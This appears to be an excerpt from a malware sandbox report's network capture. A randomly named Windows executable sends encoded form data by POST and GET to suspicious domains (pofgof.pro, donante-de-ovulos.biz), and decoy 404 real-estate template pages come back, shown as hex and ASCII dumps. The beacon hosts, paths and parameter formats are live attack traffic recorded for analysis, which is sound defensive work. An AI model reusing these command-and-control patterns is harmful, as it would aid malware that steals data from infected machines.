                                                              Sep 25, 2024 09:17:12.820071936 CEST1236INData Raw: 61 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6e 61 76 2d 6c 69 6e 6b 22 3e 48 6f 6d 65 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61
                                                              Data Ascii: a href="index.html" class="nav-item nav-link">Home</a> <a href="about.html" class="nav-item nav-link">About</a> <div class="nav-item dropdown"> <a href="#" class="n
                                                              Sep 25, 2024 09:17:12.820084095 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 6f 6e 74 61 63 74 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 6e 61 76
                                                              Data Ascii: </div> <a href="contact.html" class="nav-item nav-link">Contact</a> </div> <a href="" class="btn btn-primary px-3 d-none d-lg-flex">Add Property</a>
                                                              Sep 25, 2024 09:17:12.820091009 CEST1236INData Raw: 2f 68 65 61 64 65 72 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a
                                                              Data Ascii: /header.jpg" alt=""> </div> </div> </div> ... Header End --> ... Search Start --> <div class="container-fluid bg-primary mb-5 wow fadeIn" data-wow-delay="0.1s" style="padd
                                                              Sep 25, 2024 09:17:12.820105076 CEST1236INData Raw: 20 20 3c 73 65 6c 65 63 74 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 73 65 6c 65 63 74 20 62 6f 72 64 65 72 2d 30 20 70 79 2d 33 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: <select class="form-select border-0 py-3"> <option selected>Location</option> <option value="1">Location 1</option> <option value=
                                                              Sep 25, 2024 09:17:12.820111036 CEST896INData Raw: 6d 62 2d 34 22 3e 57 65 e2 80 99 72 65 20 73 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 68 61 76 65 20 6c 6f 6f 6b 65 64 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 20 69 6e 20 6f 75 72 20 77 65 62 73 69 74 65 21 20 4d
                                                              Data Ascii: mb-4">Were sorry, the page you have looked for does not exist in our website! Maybe go to our home page or try to use a search?</p> <a class="btn btn-primary py-3 px-5" href="">Go Back To Home</a>
                                                              Sep 25, 2024 09:17:12.820127010 CEST1236INData Raw: 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 20 6d 65 2d 33 22 3e
                                                              Data Ascii: 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i c
                                                              Sep 25, 2024 09:17:12.820131063 CEST224INData Raw: 20 26 20 43 6f 6e 64 69 74 69 6f 6e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d
                                                              Data Ascii: & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5> <div class="row g-2 pt-2">
                                                              Sep 25, 2024 09:17:12.825190067 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69
                                                              Data Ascii: <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-1.jpg" alt=""> </div> <div class="col-4">


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.849734209.74.95.29806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:17:14.789195061 CEST1756OUTPOST /gfz9/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.pofgof.pro
                                                              Origin: http://www.pofgof.pro
                                                              Referer: http://www.pofgof.pro/gfz9/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 4f 47 71 6c 4d 62 59 4c 64 38 50 4a 6e 50 49 6f 70 46 37 44 5a 72 61 47 62 73 6b 4c 5a 45 46 70 4e 6e 66 32 34 38 6a 70 37 4d 34 6a 75 75 59 61 31 6b 62 33 4a 68 35 62 51 34 4f 6c 64 2b 71 33 71 42 62 52 61 69 68 42 4a 50 33 35 62 74 66 69 35 46 53 54 50 55 32 59 6d 51 73 44 76 68 36 31 2f 66 64 41 47 37 64 34 45 62 66 58 55 34 2f 68 34 69 37 59 48 42 45 31 4c 67 50 4e 76 44 62 70 41 34 35 4e 58 7a 66 42 47 7a 38 30 4c 71 41 63 48 4d 66 30 37 33 51 49 58 42 75 66 6a 32 51 79 2b 62 4a 68 56 64 6d 75 63 56 66 2b 6a 76 56 4b 37 4b 47 62 2b 46 30 30 69 75 6c 77 65 30 79 5a 56 50 4e 52 2f 76 61 2b 50 51 43 6b 56 48 35 57 36 65 50 37 64 49 79 54 67 4a 58 66 5a 30 51 43 76 5a 39 70 62 48 76 72 63 34 63 2b 4e 59 43 6b 37 32 50 64 53 32 39 7a 55 41 70 54 6d 4e 65 58 54 34 64 6f 42 46 7a 31 72 4c 4c 51 59 77 53 35 4a 78 78 4e 64 49 61 41 34 36 67 4a 53 6f 6e 79 66 58 50 56 78 42 46 38 30 6b 35 50 71 52 34 41 30 52 74 46 37 4e 6e 6e 34 6d 4c 75 33 45 66 48 42 47 61 32 66 6a 43 31 32 4e [TRUNCATED]
                                                              Data Ascii: Ux_TPFo=OGqlMbYLd8PJnPIopF7DZraGbskLZEFpNnf248jp7M4juuYa1kb3Jh5bQ4Old+q3qBbRaihBJP35btfi5FSTPU2YmQsDvh61/fdAG7d4EbfXU4/h4i7YHBE1LgPNvDbpA45NXzfBGz80LqAcHMf073QIXBufj2Qy+bJhVdmucVf+jvVK7KGb+F00iulwe0yZVPNR/va+PQCkVH5W6eP7dIyTgJXfZ0QCvZ9pbHvrc4c+NYCk72PdS29zUApTmNeXT4doBFz1rLLQYwS5JxxNdIaA46gJSonyfXPVxBF80k5PqR4A0RtF7Nnn4mLu3EfHBGa2fjC12Njnwo+p9iDCOgujskK3Kp8+gPqwKNUhE167durxZebFnOEi/Bj2J5IMsgizcJTVu9Er5+uGlxGEuSvv/l7j/INrluHik1MZeN03srBgl9J9HPqe1E91TPr0jpB1J98fDFVP9PgLIodZfBzWijtyvNU4jVtAlFKRFPzxNNYatdOJAez6oRyOayitLUJ4pzkVltrfsSjE4wQe14a60XvllI/XSSREc0HV4AmNmZNQtoJ5MzBOLltABA+9dOHizNHuscQqtELrxYWLSRAugr9tWkV3asIGxVs7mpE65tVw7ZOhQgJ5tvkv8nZ3FB5RlnRkIBVESndOazJA6Uxisbo/o8JLvnxP7dVAFlOEqmL9QJpIRA3dtksbuUV0MbDfk9m8olStdXY8qaLPU8/vVQTLuJq5BgHOw6PC7UYTpcgW7DD17Ma67TMVcoJyTax07agGZG9prDs+FpTPnwzwME5c27Grtwh9I9/P8t5HiumBF0dXCWq9uke9HmL4vc7eer6UMb5jAF6PH2v48nwPM/1uBzVwp7/cRx0VO4JL2ejFdM9+Ues5xnjKmUPsE6TL/m5Gu1Bgu8lvVcCtBYbRpY8xf3AhiQnq+wuI+MxK9gqxORLQqZk+cgBwrXW2W2UmSy/ZcebgkUsHN5NAVbXn4aKrwFb//H5LHJYg2xvi [TRUNCATED]
                                                              Sep 25, 2024 09:17:15.383615971 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Wed, 25 Sep 2024 07:17:15 GMT
                                                              Server: Apache
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 13928
                                                              X-XSS-Protection: 1; mode=block
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                              Sep 25, 2024 09:17:15.383632898 CEST1236INData Raw: 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d
                                                              Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="cs
                                                              Sep 25, 2024 09:17:15.383646965 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 2d 30 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 4d 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20
                                                              Data Ascii: <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-
                                                              Sep 25, 2024 09:17:15.383660078 CEST1236INData Raw: 73 3d 22 6e 61 76 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72
                                                              Data Ascii: s="nav-item dropdown"> <a href="#" class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Pages</a> <div class="dropdown-menu rounded-0 m-0">
                                                              Sep 25, 2024 09:17:15.383671999 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 62 72 65 61 64 63 72 75 6d 62 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 48 6f 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: <li class="breadcrumb-item"><a href="#">Home</a></li> <li class="breadcrumb-item"><a href="#">Pages</a></li> <li class="breadcrumb-item text-body active" aria-current="page">4
                                                              Sep 25, 2024 09:17:15.383688927 CEST1236INData Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c
                                                              Data Ascii: <div class="col-md-4"> <input type="text" class="form-control border-0 py-3" placeholder="Search Keyword"> </div> <div class="col-md-4">
                                                              Sep 25, 2024 09:17:15.383702993 CEST1236INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 22 3e 0d 0a 20 20 20 20
                                                              Data Ascii: div> </div> <div class="col-md-2"> <button class="btn btn-dark border-0 w-100 py-3">Search</button> </div> </div> </div>
                                                              Sep 25, 2024 09:17:15.383714914 CEST448INData Raw: 70 74 2d 35 20 6d 74 2d 35 20 77 6f 77 20 66 61 64 65 49 6e 22 20 64 61 74 61 2d 77 6f 77 2d 64 65 6c 61 79 3d 22 30 2e 31 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 79
                                                              Data Ascii: pt-5 mt-5 wow fadeIn" data-wow-delay="0.1s"> <div class="container py-5"> <div class="row g-5"> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Get In Touc
                                                              Sep 25, 2024 09:17:15.383735895 CEST1236INData Raw: 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 20 6d 65 2d 33 22 3e
                                                              Data Ascii: 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i c
                                                              Sep 25, 2024 09:17:15.383749962 CEST1236INData Raw: 20 26 20 43 6f 6e 64 69 74 69 6f 6e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d
                                                              Data Ascii: & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5> <div class="row g-2 pt-2">
                                                              Sep 25, 2024 09:17:15.388683081 CEST1236INData Raw: 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 20 72 6f 75 6e 64 65 64 20 62 67 2d 6c 69 67 68 74 20
                                                              Data Ascii: ="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-6.jpg" alt=""> </div> </div> </div> <div c


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.849735209.74.95.29806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:17:17.337405920 CEST470OUTGET /gfz9/?FvypB=88kTDXb8k4dH&Ux_TPFo=DECFPtkNR+L/pYonsxrHc+WCM/VSeiNdGHXC1uiZlfELiNg401X1ACIRXYvsaPq78G/yZTFuD+bUVczsz0zGAWWWu1tjgA/c8IlwGYN4NejsTIqQyiKVQyEjdjnk1Av5Dw== HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.pofgof.pro
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:17:17.913590908 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Wed, 25 Sep 2024 07:17:17 GMT
                                                              Server: Apache
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 13928
                                                              X-XSS-Protection: 1; mode=block
                                                              Connection: close
                                                              Content-Type: text/html; charset=utf-8
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                              Sep 25, 2024 09:17:17.913614988 CEST224INData Raw: 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c
                                                              Data Ascii: el="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template
                                                              Sep 25, 2024 09:17:17.913630009 CEST1236INData Raw: 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79
                                                              Data Ascii: Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><body> <div class="container-xxl bg-white p-0"> ... Spinner Start --> <div id="spinner" class="show bg-white position-fixed translate-middle w
                                                              Sep 25, 2024 09:17:17.913642883 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 2d 69 63 6f 6e 22 3e 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e
                                                              Data Ascii: <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav ms-auto"> <a hr
                                                              Sep 25, 2024 09:17:17.913661003 CEST1236INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 74 65 73 74 69 6d 6f 6e 69 61 6c 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d
                                                              Data Ascii: > <a href="testimonial.html" class="dropdown-item">Testimonial</a> <a href="404.html" class="dropdown-item active">404 Error</a> </div>
                                                              Sep 25, 2024 09:17:17.913670063 CEST672INData Raw: 62 6f 64 79 20 61 63 74 69 76 65 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 34 30 34 20 45 72 72 6f 72 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6f 6c 3e 0d 0a 20 20
                                                              Data Ascii: body active" aria-current="page">404 Error</li> </ol> </nav> </div> <div class="col-md-6 animated fadeIn"> <img class="img-fluid" src="img/hea
                                                              Sep 25, 2024 09:17:17.913675070 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74
                                                              Data Ascii: <div class="col-md-4"> <input type="text" class="form-control border-0 py-3" placeholder="Search Keyword"> </div> <div class="col-md
                                                              Sep 25, 2024 09:17:17.913681030 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63
                                                              Data Ascii: </div> </div> <div class="col-md-2"> <button class="btn btn-dark border-0 w-100 py-3">Search</button> </div>
                                                              Sep 25, 2024 09:17:17.913681984 CEST1236INData Raw: 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 65 61 72 63 68 20 45 6e 64 20 2d 2d 3e 0d 0a 0d 0a 0d 0a 20 20
                                                              Data Ascii: </div> </div> </div> ... Search End --> ... 404 Start --> <div class="container-xxl py-5 wow fadeInUp" data-wow-delay="0.1s"> <div class="container text-center">
                                                              Sep 25, 2024 09:17:17.913687944 CEST224INData Raw: 6c 61 73 73 3d 22 74 65 78 74 2d 77 68 69 74 65 20 6d 62 2d 34 22 3e 47 65 74 20 49 6e 20 54 6f 75 63 68 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e
                                                              Data Ascii: lass="text-white mb-4">Get In Touch</h5> <p class="mb-2"><i class="fa fa-map-marker-alt me-3"></i>123 Street, New York, USA</p> <p class="mb-2"><i class="fa fa-phone-alt me-3
                                                              Sep 25, 2024 09:17:17.918695927 CEST1236INData Raw: 22 3e 3c 2f 69 3e 2b 30 31 32 20 33 34 35 20 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d
                                                              Data Ascii: "></i>+012 345 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-socia


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              21192.168.2.849736199.59.243.227806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:17:23.027954102 CEST752OUTPOST /8lrv/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.donante-de-ovulos.biz
                                                              Origin: http://www.donante-de-ovulos.biz
                                                              Referer: http://www.donante-de-ovulos.biz/8lrv/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
